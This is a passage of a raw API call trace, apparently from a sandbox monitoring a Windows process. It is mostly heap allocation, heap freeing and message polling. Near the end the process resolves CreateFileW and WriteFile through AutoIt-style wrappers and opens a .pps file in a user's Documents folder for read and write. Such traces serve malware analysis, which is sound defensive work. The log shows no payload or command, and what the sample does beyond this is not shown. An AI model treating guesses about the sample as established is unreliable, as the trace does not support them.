hHeap=0x8a0000) returned 1 [0179.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0179.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0179.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0179.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0179.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0179.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0179.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0179.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0179.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0179.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0179.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda68 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4f8 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda50 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a60 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba2e8 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0179.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0179.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.270] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0179.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.271] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0179.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.272] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0179.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.272] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.272] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.272] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.272] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.272] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.284] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.284] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.285] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.285] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.285] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0179.285] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0179.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0179.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0179.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba288 [0179.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba288, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0179.287] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\iznb7dzlokqso_3s.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0179.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0179.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0179.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0179.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0179.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0179.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0179.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0179.287] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.287] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0179.287] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0179.287] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0179.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0179.288] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0179.288] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0179.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0179.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0179.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0179.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0179.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0179.288] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0179.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0179.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0179.288] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0179.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0179.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd468 [0179.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd468, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0179.290] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.290] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0179.290] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0179.290] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0179.290] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0179.290] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0179.290] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0179.290] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 